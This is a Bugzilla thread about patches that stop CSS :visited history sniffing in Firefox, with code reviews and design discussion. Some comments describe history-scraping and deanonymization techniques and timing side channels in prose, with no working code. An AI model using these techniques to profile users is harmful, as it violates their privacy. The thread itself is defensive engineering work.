Updated•15 years ago
|
Whiteboard: [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting] → [sg:want P1][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting]
Updated•15 years ago
|
Assignee | ||
Comment 172•15 years ago
|
||
I'm going to attach a series of patches that I believe fix this bug.
The approach taken by these patches is described in detail in
http://dbaron.org/mozilla/visited-privacy , which I'll probably
eventually turn into a blog entry or something similar.
I've generated tryserver builds containing these patches (and a few
others, in particular, those for bug 550497, bug 534804, and bug 544834)
on top of a random trunk changeset (in particular,
http://hg.mozilla.org/mozilla-central/rev/02c434f2fd4a ), based on the
state of these patches in my patch queue at
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/rev/6205844d887e .
The builds are here (though they'll be deleted around March 22, I think):
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-7a25c034a494/
These builds could be badly broken and do horrible things, so I don't
recommend using them. However, if you really feel the need to test the
patch right now, they're probably your best choice. However, absolutely
do not install them as your main browser, since you'll be stuck without
any security updates in the future.
Assignee | ||
Comment 173•15 years ago
|
||
Attachment #431523 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 174•15 years ago
|
||
Attachment #431524 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 175•15 years ago
|
||
Attachment #431525 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 176•15 years ago
|
||
Attachment #431527 -
Flags: review?(roc)
Assignee | ||
Comment 177•15 years ago
|
||
Attachment #431528 -
Flags: review?(zweinberg)
Assignee | ||
Comment 178•15 years ago
|
||
Assignee | ||
Comment 179•15 years ago
|
||
Attachment #431531 -
Flags: review?(zweinberg)
Attachment #431527 -
Flags: review?(roc) → review+
Assignee | ||
Comment 180•15 years ago
|
||
Attachment #431532 -
Flags: review?(zweinberg)
Assignee | ||
Comment 181•15 years ago
|
||
Attachment #431533 -
Flags: review?(bernd_mozilla)
Assignee | ||
Comment 182•15 years ago
|
||
Attachment #431535 -
Flags: review?(zweinberg)
Assignee | ||
Comment 183•15 years ago
|
||
Attachment #431536 -
Flags: review?(bzbarsky)
Assignee | ||
Updated•15 years ago
|
Attachment #431529 -
Flags: review?(zweinberg)
Assignee | ||
Comment 184•15 years ago
|
||
Attachment #431537 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 185•15 years ago
|
||
Attachment #431538 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 186•15 years ago
|
||
Attachment #431539 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 187•15 years ago
|
||
Attachment #431540 -
Flags: review?(sdwilsh)
Assignee | ||
Comment 188•15 years ago
|
||
Attachment #431541 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 189•15 years ago
|
||
Attachment #431542 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 190•15 years ago
|
||
Attachment #431543 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 191•15 years ago
|
||
Attachment #431544 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 192•15 years ago
|
||
Attachment #431545 -
Flags: review?(bzbarsky)
Comment 193•15 years ago
|
||
- PRBool foreground;
- styleData->GetBorderColor(aSide, aColor, foreground);
- if (foreground) {
- aColor = aFrame->GetStyleColor()->mColor;
- }
+ aColor = aFrame->GetStyleContext()->GetVisitedDependentColor(
+ nsCSSProps::SubpropertyEntryFor(eCSSProperty_border_color)[aSide]);
}
where did that 'if(foreground)' clause go? Is that no longer necessary?
Assignee | ||
Comment 194•15 years ago
|
||
It's no longer necessary; see the comment added in patch 7, and the underlying code which is already in nsStyleAnimation.cpp (called from the code in patch 3): nsStyleAnimation::ExtractComputedValue, case eStyleAnimType_Custom, calls to ExtractBorderColor, and the ExtractBorderColor function itself in the same file.
Comment 195•15 years ago
|
||
Comment on attachment 431540 [details] [diff] [review]
patch 15: fix initialization comment in nsRuleProcessorData
r=sdwilsh
Attachment #431540 -
Flags: review?(sdwilsh) → review+
Comment 196•15 years ago
|
||
OK, how do I unsubscribe from this damned thing? Unchecking "Add me to CC list" and clicking "Commit" doesn't seem to work.
Assignee | ||
Comment 197•15 years ago
|
||
(In reply to comment #196)
> OK, how do I unsubscribe from this damned thing? Unchecking "Add me to CC list"
> and clicking "Commit" doesn't seem to work.
It appears you're getting email because you voted for this bug. To stop getting such email you could either:
* stop voting for the bug by clicking the "(vote)" link next to "Importance" near the top
* change your Bugzilla email preferences so you don't get email for bugs you've voted for ("Preferences" link at bottom of page)
However, you *also* just added yourself to the cc: list. So you'd also need to remove yourself from that ("(edit)", highlight your name, and check "Remove selected CCs") or, again, change your bugzilla email preferences accordingly.
Comment 198•15 years ago
|
||
Comment on attachment 431529 [details] [diff] [review]
patch 6: draw 'background-color' using the visited-dependent style
As discussed on IRC, change NS_GET_A(bgcolor) == 255 to NS_GET_A(bgcolor) > 0 in nsObjectFrame::CreateWidget. Otherwise looks good.
Attachment #431529 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431528 -
Flags: review?(zweinberg) → review+
Comment 199•15 years ago
|
||
Comment on attachment 431531 [details] [diff] [review]
patch 7: prerequisite comments for drawing 'border-*-color' using the visited-dependent style
>+PR_STATIC_ASSERT(NS_SIDE_TOP == 0);
>+PR_STATIC_ASSERT(NS_SIDE_RIGHT == 1);
>+PR_STATIC_ASSERT(NS_SIDE_BOTTOM == 2);
>+PR_STATIC_ASSERT(NS_SIDE_LEFT == 3);
This is already checked in at least one other place that I know of, but if you want it here as well (presumably because of the equivalnece with the eCSSProperty_border_*_color values) I guess I don't mind.
Attachment #431531 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431532 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431535 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Assignee | ||
Comment 200•15 years ago
|
||
I found two mistakes in the previous version of this patch while writing tests:
* RuleProcessorData::GetContentStateForVisitedHandling needs to consider whether the node is the relevant link
* RuleProcessorData::GetContentStateForVisitedHandling needs to call ContentState() rather than looking at mContentState.
I caught the first because it failed a test I wrote, and the second because it triggered an assertion I wrote in the code while I was fixing the first.
The current state of my tests is:
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/raw-file/7eb28678760d/visited-reftests
but I still have more to write.
Attachment #431545 -
Attachment is obsolete: true
Attachment #433167 -
Flags: review?(bzbarsky)
Attachment #431545 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 201•15 years ago
|
||
This adds the following code to nsStyleSet::GetContext:
if (aIsLink) {
// If this node is a link, we want its visited's style context's
// parent to be the regular style context of its parent, because
// only the visitedness of the relevant link should influence style.
parentIfVisited = aParentContext;
}
in order to fix the bug that I was setting the parent style context incorrectly for the if-visited style data for links that were descendants of other links.
Attachment #431541 -
Attachment is obsolete: true
Attachment #433210 -
Flags: review?(bzbarsky)
Attachment #431541 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 202•15 years ago
|
||
... and this weakens the first "parent mismatch" assertion in nsStyleContext::SetStyleIfVisited which was correspondingly incorrect.
Attachment #431524 -
Attachment is obsolete: true
Attachment #433212 -
Flags: review?(bzbarsky)
Attachment #431524 -
Flags: review?(bzbarsky)
Comment 203•15 years ago
|
||
Hi all. This has been a very interesting thread to read through. dbaron seems to understand the scope of this issue.
To add a little bit, here's my new (open source) research site:
http://cssfingerprint.com
Things it does right now:
* SVM-based AI to identify who you are vs previous people it's seen, and who is similar
- note that I am NOT trying to fingerprint your browser, but to fingerprint you-the-human through your browsing behavior; this is dramatically more powerful than Panopticlick.
* extremely fast URL scraper - browser-locally I can currently scrape ~200k-3.5M links per minute (depending on browser; Firefox is ~400k, lagging far behind Safari/Chrome)
- caveat: a) the server I'm using can't keep up with this speed, and b) I'm testing 4x variants per link right now; actual current full-circle performance is ~50-200k (4x-tested) links/min. But this is definitely a temporary restriction; I fully expect to get within 80% of the local speed after more server side improvements.
* demographics determination based on Quantcast data (very slow server side right now 'cause it's just deployed and I'm not yet caching some critical path data)
In the near future it will also:
* do bootstrapping intelligent URL scraping (i.e. if Y is a more likely hit for visitors of X, test Y if you get positive for X)
- right now the search is fairly dumb - first by other users' hits, then by a combination of alexa/google/technorati/bloglines/quantcast ranking - with only ~16-800 hits per 1 minute scraping. And I only test domains that show up in those rankings (plus a dozen or so custom ones), not longer URLs. I expect my hit rate to improve dramatically with a smarter and broader search algorithm.
* do full visitor deanonymization along the lines of iseclab's experiment [0]
- except I'm not going to limit myself to Xing, and will be trying to use results across different social networks
* integrate other active and passive fingerprinting attacks (right now it is *strictly* CSS-history based), like p0f etc
* have hooks for automated testing with a privacy testing framework being developed by Len Sassaman
* use a few other AI methods for user identification (the current AI is not all that great)
My perspective here is as an attacker rather than a defender - though I'm very friendly to the desire for privacy (I run a Tor node, I have friends in the EFF, etc).
Regarding things that have been discussed so far:
* dbaron is correct that anything short of either VERY strict whitelisting, a "same-origin policy", or full dropping of :visited support will fail. If you allow anything that changes the DOM or rendered structure, I will detect it.
* IMHO a same-origin policy breaks both user expectations and a significant part of functionality - but that's a tradeoff that's not my call.
* I can't currently think of a way to attack the potential fix of permitting only 'color' on :visited, and keeping a 'non-visited-color' property on all elements that you use to lie to Javascript. FWIW, Dan Kaminsky thinks he can find a hole in it, but hasn't managed yet from our discussions so far.
* I don't know how anything about Firefox backend rendering speed issues, so my comments are not taking them into account. However, I would point out that Firefox is right now dramatically slower than Safari/Chrome on my tests.
Enjoy,
Sai
[0] http://www.iseclab.org/people/gilbert/experiment
Comment 204•15 years ago
|
||
> dbaron is correct that anything short of either VERY strict whitelisting, a
> "same-origin policy", or full dropping of :visited support will fail.
Do you see a way to circumvent dbaron's current approach and patches, concretely?
Comment 205•15 years ago
|
||
Sorry, I didn't read far enough:
> I can't currently think of a way to attack the potential fix
Comment 206•15 years ago
|
||
Ben: I do not. I haven't looked at the patches that deal with backend code, but from his discussion of his approach, it seems solid.
Of course it'd probably be a good idea to give us (i.e. people working on the attack) a RC version before calling it 'fixed'. This isn't really the sort of thing that is amenable to an easy automated answer; it's more a case of it wins if it survives being poked at for a while... until someone comes up with a cleverer attack, of course. ;-)
Comment 207•15 years ago
|
||
(In reply to comment #206)
> Of course it'd probably be a good idea to give us (i.e. people working on the
> attack) a RC version before calling it 'fixed'.
see comment 172
Comment 208•15 years ago
|
||
I was talking to Sai about this and he suggested I make a comment here -- so I haven't read through and understood the current state of discussion, apologies.
Anyway, I find one property of the "limit CSS properties of visited links to color etc." very sketchy, namely that it suddenly becomes a _security-critical behaviour_ that color not affect size or other properties of links. It's a sensible assumption, to be sure, but I could certainly imagine some version of some OS breaking it. Maybe, for instance, the antialiaser exhibits some subtle dependency from color to size, characters of a more contrasting color having a tiny tiny subpixel difference in width -- voila, security hole.
Comment 209•15 years ago
|
||
As I understand things, we don't provide colour information to the font subsystem when asking it for width, so it can't vary in that way. We, not the OS, control where elements in the page are rendered, so in the case you describe it would simply draw beyond our expected bounds, not affect placement of any elements on the page.
Does that address your concern?
Comment 210•15 years ago
|
||
I had a friend bring up what Web designers actually want out of :link/:visited differentiation on MetaFilter: http://ask.metafilter.com/148349/Web-designers-how-do-you-use-CSS-with-link-and-visited
Comment 211•15 years ago
|
||
dbaron wrote in comment 172:
> I've generated tryserver builds containing these patches (and a few
> others, in particular, those for bug 550497, bug 534804, and bug 544834)
> The builds are here (though they'll be deleted around March 22, I think):
> https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-7a25c034a494/
Given that we're approaching March 22, I mirrored them on my server:
http://www.bucksch.org/xfer/visited/
fc93ba7f269e335078f9ed48f3332ea4 try-7a25c034a494-linux.tar.bz2
5c25f7d0e60308df45c1f8d25a241b07 try-7a25c034a494-macosx.dmg
f6f9d2808c2c97b6c8dc68410a610dd1 try-7a25c034a494-win32.zip
Comment 212•15 years ago
|
||
(In reply to comment #208)
> Anyway, I find one property of the "limit CSS properties of visited links to
> color etc." very sketchy, namely that it suddenly becomes a _security-critical
> behaviour_ that color not affect size or other properties of links.
I don't think this would necessarily always be the case, although in some cases I suspect it might well be (and note you shouldn't consider my assertions as authoritative). In the first case it's a privacy violation, which we usually classify as distinct from security issue. (One still might be the other, of course, on a case-by-case basis.) In the second case it's possible there might be mitigating factors (accuracy of exploitation perhaps -- or, as with this partial fix, requiring some form of user interaction) that would make it harder to exploit the leak. If there were such, that might further downgrade severity.
But overall, I think we'd have to treat such problems individually rather than presumptively adopt one generalized rule.
Assignee | ||
Comment 213•15 years ago
|
||
This draws both the color and the fallback color for 'fill' and 'stroke' using visited-dependent colors. (See http://dbaron.org/mozilla/visited-privacy for more details.)
I'm not sure whether I should be doing the fallback color, though (since I'm not honoring the change in paint servers); I'm reasonably confident that doing the color is the right thing, though.
Attachment #434899 -
Flags: review?(jwatt)
Assignee | ||
Comment 214•15 years ago
|
||
Assignee | ||
Comment 215•15 years ago
|
||
Assignee | ||
Comment 216•15 years ago
|
||
Attachment #434902 -
Flags: review?(jwatt)
Assignee | ||
Comment 217•15 years ago
|
||
More up-to-date builds (although without the 'fill' and 'stroke' changes attached above) are at:
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-5200664a0844/
These are based on:
http://hg.mozilla.org/mozilla-central/file/b3367021d661
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/file/2e65d827e0a6
(bottom 28 patches in queue)
All the warnings in comment 172 apply to these as well.
Assignee | ||
Comment 218•15 years ago
|
||
And another round of builds with the 'fill' and 'stroke' changes at:
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-e2866d339b67/
(Mac not there yet, but should be soon).
Again, same warnings from comment 172 apply.
Assignee | ||
Comment 219•15 years ago
|
||
I converted some existing tests that needed conversion using nsWindowSnapshot, but that would have been painful for some of the ones that remained, so I added this API to DOMWindowUtils to make the conversion easier.
I think the diversity of having some tests do it one way and some the other is probably good.
Attachment #435047 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 220•15 years ago
|
||
As I said in the previous comment, I did some conversion using WindowSnapshot and then decided to do the rest using a DOMWindowUtils API.
Attachment #435048 -
Flags: review?(sdwilsh)
Updated•15 years ago
|
Attachment #435048 -
Flags: review?(sdwilsh) → review+
Comment 221•15 years ago
|
||
Comment on attachment 435048 [details] [diff] [review]
patch 3.75: fix tests currently in the tree to deal with the new rules
r=sdwilsh
Assignee | ||
Comment 222•15 years ago
|
||
And here's one final try server build (for now):
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-3a14a6acc0ac/
which no longer contains the patches for bug 534804 and bug 544834, but instead only the patches for this bug.
It's a build of http://hg.mozilla.org/mozilla-central/file/b3367021d661 plus the bottom 26 patches of my patch queue in its state at http://hg.mozilla.org/users/dbaron_mozilla.com/patches/file/33fbcac84993
Again, same warnings from comment 172 apply.
Comment 223•15 years ago
|
||
Comment on attachment 434899 [details] [diff] [review]
patch 10.5: draw 'fill' and 'stroke' colors using visited-dependent style
>+ if (paintIfVisited.mType == paint.mType) {
This doesn't look right to me. If |paintIfVisited.mType == eStyleSVGPaintType_Server| I think we should be using GetPaintServer with the visited paint server URL. Otherwise, if the base fill/stroke specifies an invalid paint server, a matching visited style specifying a valid paint server will never override the invalid base style and use its valid paint server. (Maybe you could also check that in the test that you modified?)
Assignee | ||
Comment 224•15 years ago
|
||
The point is that we don't allow :visited styles to influence anything other than simple colors; if it's switching to a different paint server that could cause URL loading or cause measurable performance differences.
It's not clear to me whether it's better to allow the styles only to influence the color that's the primary, or also let them influence the color that's the fallback (even though it's not allowed to influenced the paint server that the color is a fallback for).
Comment 225•15 years ago
|
||
I see. Personally I think they should be able to influence the fallback.
I only have one other question: what is the purpose of the |if (paintIfVisited.mType == paint.mType)| around the code that that |if| statement gates? It looks to me like the |isServer ?| part takes care of doing the right thing, and the |if| check should just be removed.
Assignee | ||
Comment 226•15 years ago
|
||
(In reply to comment #225)
> I see. Personally I think they should be able to influence the fallback.
>
> I only have one other question: what is the purpose of the |if
> (paintIfVisited.mType == paint.mType)| around the code that that |if| statement
> gates? It looks to me like the |isServer ?| part takes care of doing the right
> thing, and the |if| check should just be removed.
The purpose is that I'm only swapping from primary-to-primary or fallback-to-fallback if they differ based on :visited styles; I'm never swapping primary-to-fallback or fallback-to-primary. Again, that could be changed, but it seemed like the right thing to me. (If I wanted to change it, I'd need a second |isServer| corresponding to the value of paintIfVisited.)
Comment 227•15 years ago
|
||
Comment on attachment 431523 [details] [diff] [review]
patch 1: split nsStyleSet::ResolveStyleForRules into two different APIs
r=bzbarsky
Attachment #431523 -
Flags: review?(bzbarsky) → review+
Comment 228•15 years ago
|
||
Comment on attachment 433212 [details] [diff] [review]
patch 2: add mechanism for separate style context for visited style
>+++ b/layout/style/nsStyleContext.cpp
>+ if (thisVis) {
>+ if (otherVis) {
How about:
if (!thisVis != !otherVis) {
// Presume a difference
NS_UpdateHint(hint, NS_STYLE_HINT_VISUAL);
} else if (thisVis) {
// The change stuff goes here.
}
>+ // NB: Calling Peek on |this|, not |thisVis|.
Why? This seems like it could use a good "why" comment, not a "what" comment... I assume something to the effect that someone might have gotten the struct off us even if they never got it off thisVis?
Does it make sense to add !change checks on the PeekStyleBackground/PeekStyleBorder conditionals?
>+ nsStyleContext* StyleIfVisited()
>+ { return mStyleIfVisited; }
It might be good to document whatever invariants this style context satisfies (e.g. the ones we assert in SetStyleIfVisited).
r=bzbarsky
Attachment #433212 -
Flags: review?(bzbarsky) → review+
Comment 229•15 years ago
|
||
Comment on attachment 431525 [details] [diff] [review]
patch 3: add function to nsStyleUtil for choosing appropriate color based on visitedness
r=bzbarsky
Attachment #431525 -
Flags: review?(bzbarsky) → review+
Assignee | ||
Comment 230•15 years ago
|
||
(In reply to comment #228)
> >+ // NB: Calling Peek on |this|, not |thisVis|.
>
> Why? This seems like it could use a good "why" comment, not a "what"
> comment... I assume something to the effect that someone might have gotten the
> struct off us even if they never got it off thisVis?
I think both that, and because thisVis might be null, and because when they got it there might not have been a style-if-visited (or something like that)?
Updated•15 years ago
|
Attachment #435047 -
Flags: review?(bzbarsky) → review+
Comment 231•15 years ago
|
||
Comment on attachment 435047 [details] [diff] [review]
patch 3.5: add API to nsDOMWindowUtils to ease conversion of existing tests
r=bzbarsky
Comment 232•15 years ago
|
||
Comment on attachment 431536 [details] [diff] [review]
patch 11: introduce TreeMatchContext for output from SelectorMatchesTree
This seems fine, but why a pointer instead of a non-const reference? The latter would make it clear that null is not an issue...
Attachment #431536 -
Flags: review?(bzbarsky) → review+
Comment 233•15 years ago
|
||
Comment on attachment 431537 [details] [diff] [review]
patch 12: introduce NodeMatchContext for additional input into SelectorMatches
> In other words,
>+ * a single node might have multiple value NodeMatchContext at one time,
>+ * but only one possible RuleProcessorData.
Maybe "In other words, there might be multiple NodeMatchContexts corresponding to a single node, but only one possible RuleProcessorData"? Or something like that.
And again, why a pointer instead of a reference?
Attachment #431537 -
Flags: review?(bzbarsky) → review+
Comment 234•15 years ago
|
||
Comment on attachment 431538 [details] [diff] [review]
patch 13: propagate whether we have a relevant link out of selector matching
>+ // Always false when TreeMatchContext::mForStyling is false.
Assert this as needed, please?
r=bzbarsky
Attachment #431538 -
Flags: review?(bzbarsky) → review+
Comment 235•15 years ago
|
||
Comment on attachment 431539 [details] [diff] [review]
patch 14: make nsStyleContext::FindChildWithRules deal with the visited style context
I think the arguments here could use some documenting. r=bzbarsky with that.
Attachment #431539 -
Flags: review?(bzbarsky) → review+
Comment 236•15 years ago
|
||
(In reply to comment #226)
> Again, that could be changed, but it seemed like the right thing to me.
I've thought about this some more, and I think that our behavior should be described by the following "end user" doc:
"Paint servers specified in :visited styles are ignored. Such a paint server's fallback color (black by default) is then used only if it overrides a simple color. If the fallback color would override another paint server, then the fallback color is also ignored."
In other words I think if the primary is a color and the visited is a paint server, we should use the fallback; and if the primary is a paint server where the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and the visited is a color, I think the color should be used.
If you would rather keep things as you currently have them, can you explain why in a bit more detail? What I've described makes most sense to me, and is behavior that is more easily described to end users I think.
Assignee | ||
Comment 237•15 years ago
|
||
(In reply to comment #236)
> "Paint servers specified in :visited styles are ignored. Such a paint server's
> fallback color (black by default) is then used only if it overrides a simple
> color. If the fallback color would override another paint server, then the
> fallback color is also ignored."
This would cause fallback colors to be used in cases where they weren't before (e.g., if the :link style is a color and the :visited style is a gradient). I think it's a bad idea to start using fallback colors more than they were previously used, since existing content tends not to set them, so it's likely to lead to bad results.
> In other words I think if the primary is a color and the visited is a paint
> server, we should use the fallback; and if the primary is a paint server where
> the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and
> the visited is a color, I think the color should be used.
If the primary (i.e., :link) is a paint server, we have to use that paint server even if the link is :visited, since not using it would lead to measurable performance differences.
> If you would rather keep things as you currently have them, can you explain why
> in a bit more detail? What I've described makes most sense to me, and is
> behavior that is more easily described to end users I think.
So my requirement (for performance measurement) is that we never change which paint server is used based on visitedness, or whether one is used.
I'd also like to avoid using fallback colors in cases where they weren't before (as I mentioned above).
I think that leaves two reasonable possibilities:
(1) what I did, i.e., using the :visited's color to substitute the :link's color, and the :visited's fallback color to substitute for the :link's fallback color
(2) using :visited information only when the color is the primary value for both
I'm actually starting to think that maybe (2) makes more sense, because perhaps we shouldn't make fallbacks take effect when the servers themselves don't take effect. That would mean changing:
+ if (paintIfVisited.mType == paint.mType) {
+ nscolor colorIfVisited = isServer ? paintIfVisited.mFallbackColor
+ : paintIfVisited.mPaint.mColor;
to:
+ if (paintIfVisited.mType == eStyleSVGPaintType_Color &&
+ paint.mType == eStyleSVGPaintType_Color) {
+ nscolor colorIfVisited = paintIfVisited.mPaint.mColor;
Comment 238•15 years ago
|
||
(In reply to comment #237)
> This would cause fallback colors to be used in cases where they weren't before
> (e.g., if the :link style is a color and the :visited style is a gradient). I
> think it's a bad idea to start using fallback colors more than they were
> previously used, since existing content tends not to set them, so it's likely
> to lead to bad results.
I think that would be okay, since it would raise awareness of the rules and discourage people from writing content that tries to use paint servers in :visited style, or override a paint server with a :visited style color.
> > In other words I think if the primary is a color and the visited is a paint
> > server, we should use the fallback; and if the primary is a paint server where
> > the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and
> > the visited is a color, I think the color should be used.
>
> If the primary (i.e., :link) is a paint server, we have to use that paint
> server even if the link is :visited, since not using it would lead to
> measurable performance differences.
Sure, I agree that if the primary paint server is valid we need to use it and completely ignore the :visited style. By "where the fallback would be used" I was explicitly referring to the case when the primary paint server is not valid and won't be used though.
> (2) using :visited information only when the color is the primary value for
> both
I'd be okay with that. In fact that makes the rules even simpler to explain to users.
Assignee | ||
Comment 239•15 years ago
|
||
... take option (2)
Attachment #434899 -
Attachment is obsolete: true
Attachment #436071 -
Flags: review?
Attachment #434899 -
Flags: review?(jwatt)
Assignee | ||
Updated•15 years ago
|
Attachment #436071 -
Flags: review? → review?(jwatt)
Comment 240•15 years ago
|
||
Comment on attachment 436071 [details] [diff] [review]
patch 10.5: draw 'fill' and 'stroke' colors using visited-dependent style
>+ // Only use :visited information if both the :link and :visited
>+ // values are color values.
That pretty much just repeats what the code says, but doesn't say _why_ this is the case. How about something like:
// To prevent Web content from detecting if a user has visited a URL we do
// not allow :visited style to specify a paint server, nor do we allow it
// to override a paint server with a simple color. A :visited style may
// only override a simple color with another simple color.
Attachment #436071 -
Flags: review?(jwatt) → review+
Comment 241•15 years ago
|
||
Comment on attachment 434902 [details] [diff] [review]
patch 23: convert existing SVG reftest to use test_visited_reftests (from patch 21)
r=jwatt. Thanks for your patience in explaining your thinking.
Attachment #434902 -
Flags: review?(jwatt) → review+
Attachment #431533 -
Flags: review?(bernd_mozilla) → review+
Assignee | ||
Comment 242•15 years ago
|
||
One review comment from myself: I realize I should make nsStyleContext::StyleIfVisited instead be named nsStyleContext::GetStyleIfVisited per our convention that functions returning pointers should be named Get* iff they might return null.
Assignee | ||
Comment 243•15 years ago
|
||
(In reply to comment #228)
> if (!thisVis != !otherVis) {
> // Presume a difference
> NS_UpdateHint(hint, NS_STYLE_HINT_VISUAL);
> } else if (thisVis) {
> // The change stuff goes here.
> }
Done. And while I was there I also added an NS_IsHintSubset() call to the |else if| you propose, used eChangeHint_RepaintFrame instead of NS_STYLE_HINT_VISUAL throughout the new chunk, and added the properties that I've since added as visited-dependent but didn't list there, and added an assertion to GetVisitedDependentColor to remind me not to make that mistake again.
Also locally addressed all other review comments.
Comment 244•15 years ago
|
||
Comment on attachment 433210 [details] [diff] [review]
patch 16: add link visitedness to nsRuleWalker and actually construct the if-visited contexts
>+++ b/layout/style/nsRuleWalker.h
>+ // true on the RuleProcessorData *for the node being matched* if a a
s/a a/a/
r=bzbarsky
Attachment #433210 -
Flags: review?(bzbarsky) → review+
Comment 245•15 years ago
|
||
Comment on attachment 431542 [details] [diff] [review]
patch 17: propagate whether we have a relevant link to the style set
r=bzbarsky
Attachment #431542 -
Flags: review?(bzbarsky) → review+
Comment 246•15 years ago
|
||
Comment on attachment 431543 [details] [diff] [review]
patch 18: set NS_STYLE_RELEVANT_LINK_IS_VISITED on style contexts as appropriate
r=bzbarsky
Attachment #431543 -
Flags: review?(bzbarsky) → review+
Comment 247•15 years ago
|
||
Comment on attachment 431544 [details] [diff] [review]
patch 19: put expected type of visited matching in the TreeMatchContext
r=bzbarsky
Attachment #431544 -
Flags: review?(bzbarsky) → review+
Comment 248•15 years ago
|
||
Comment on attachment 433167 [details] [diff] [review]
patch 20: make selector matching operations follow the new rules
r=bzbarsky
Attachment #433167 -
Flags: review?(bzbarsky) → review+
Assignee | ||
Comment 249•15 years ago
|
||
Pushed 26 changesets to mozilla-central:
http://hg.mozilla.org/mozilla-central/pushloghtml?changeset=85754ddc898e
Comment 250•15 years ago
|
||
a:visited { outline: 1px dotted black !important;} in userContent.css
does not work anymore
Assignee | ||
Comment 251•15 years ago
|
||
(In reply to comment #250)
> a:visited { outline: 1px dotted black !important;} in userContent.css
> does not work anymore
That's as expected. It would work if you change it to:
a:link, a:visited { outline: 1px dotted ! important }
a:link { outline-color: transparent ! important }
a:visited { outline-color: black ! important }
Comment 252•15 years ago
|
||
Maybe outline should be a special case? Because outline (unlike border) does not move the content at all, it can only change a color.
Assignee | ||
Comment 253•15 years ago
|
||
However, outline causes overflow. This leads to two ways an attacker could use outline to determine whether links are in your history. First, visual overflow is detectable via performance tests, especially if it's set up to cause something the element overlaps with, whose repainting is expensive. to be forced to repaint. Second, scrollable overflow (which outline currently causes in Gecko, but that will hopefully change in the future) can be detected by various element.scroll* methods.
Comment 254•15 years ago
|
||
(In reply to comment #251)
> (In reply to comment #250)
> > a:visited { outline: 1px dotted black !important;} in userContent.css
> > does not work anymore
>
> That's as expected. It would work if you change it to:
>
> a:link, a:visited { outline: 1px dotted ! important }
It doesn't seem to make distinction, at least a:link includes also a:visited (didn't happen in Firefox 3.6)
> a:link { outline-color: transparent ! important }
This is executed
> a:visited { outline-color: black ! important }
This is ignored
Assignee | ||
Comment 255•15 years ago
|
||
I don't understand comment 254. If you believe there's a bug, could you file it as a separate bug report.
Assignee | ||
Comment 256•15 years ago
|
||
Er, sorry, you're right. It's not supposed to work, since that's a change in the alpha component of the color.
I suppose you could change between white/black if you wanted, but we won't do transparent/black.
Comment 257•15 years ago
|
||
is it just me or is this going to be a complete developer nightmare?
Comment 258•15 years ago
|
||
(In reply to comment #257)
> is it just me or is this going to be a complete developer nightmare?
At first I thought so too, but so far I haven't seen anything major being broken with the patch applied. I've noticed it at one site, but I've already contacted the owner, as it is easily fixable by, in this case, use the text-decoration property on "a" instead of "a:visited".
Assignee | ||
Comment 259•15 years ago
|
||
Optimistically marking this bug as fixed, although I already know of a few followup bugs that need to be filed.
Status: ASSIGNED → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla1.9.3a4
Keywords: dev-doc-needed
Comment 260•15 years ago
|
||
I just noticed that we fail the CSS3.info selectors test (http://www.css3.info/selectors-test) with the patches. Since this test is fairly known and used in many comparisons, I think it's of major importance to ask them to modify/remove the testcases that currently fail due to these changes, especially since we do not violate any standards, and since Webkit is planning on implementing the same thing. Perhaps this should be tracked in a separate bug, and if so, I'd appreciate if someone else (than me) created it. Thanks.
Comment 261•15 years ago
|
||
Filed bug 558569 about www.css3.info (last comment)
blocking2.0: ? → beta1+
Comment 262•15 years ago
|
||
I was told on IRC that this fix is for the upcoming Firefox 4 only, so far.
This will take another half a year unfortunately. Recently (I haven't pinpointed the date of the paper, though) it was shown that you can figure out zipcodes when using certain webpages (e.g. weather forecast sites that ask the user to input their zipcode); with this, the web-privacy problem could even become a real privacy problem. This is why it concerns me that there seem to be no plans to backport the fix as far as I was able to find out.
The paper in question is located at http://w2spconf.com/2010/papers/p26.pdf .
Maybe it should be discussed that despite the amount of work, this fix should be backported to current versions of Firefox.
Comment 263•15 years ago
|
||
Mic -
I personally share your concern about how long this will take to get into the field. But with patches like this it's a question of trade-offs. A patch like this should really go through a full beta cycle and by the time we went through that process it would look more like the Firefox 4 time frame. Plus we would spend a lot of time on backporting instead of of working on performance or other features. So as I said it's a question of trade-offs, which are never easy.
Comment 264•14 years ago
|
||
This was documented a while ago:
https://developer.mozilla.org/en/CSS/Privacy_and_the_:visited_selector
Keywords: dev-doc-needed → dev-doc-complete
Comment 266•14 years ago
|
||
getComputedStyle is not the only part that is lying, the whole document.getElementById(“any_element”).style is not anymore accessible.
How in the world do you think this is a viable solution ?
Best Regards
Assignee | ||
Comment 267•14 years ago
|
||
(In reply to comment #266)
> getComputedStyle is not the only part that is lying, the whole
> document.getElementById(“any_element”).style is not anymore accessible.
Why do you think that?
> How in the world do you think this is a viable solution ?
It isn't, nor is it what we did.
Comment 268•14 years ago
|
||
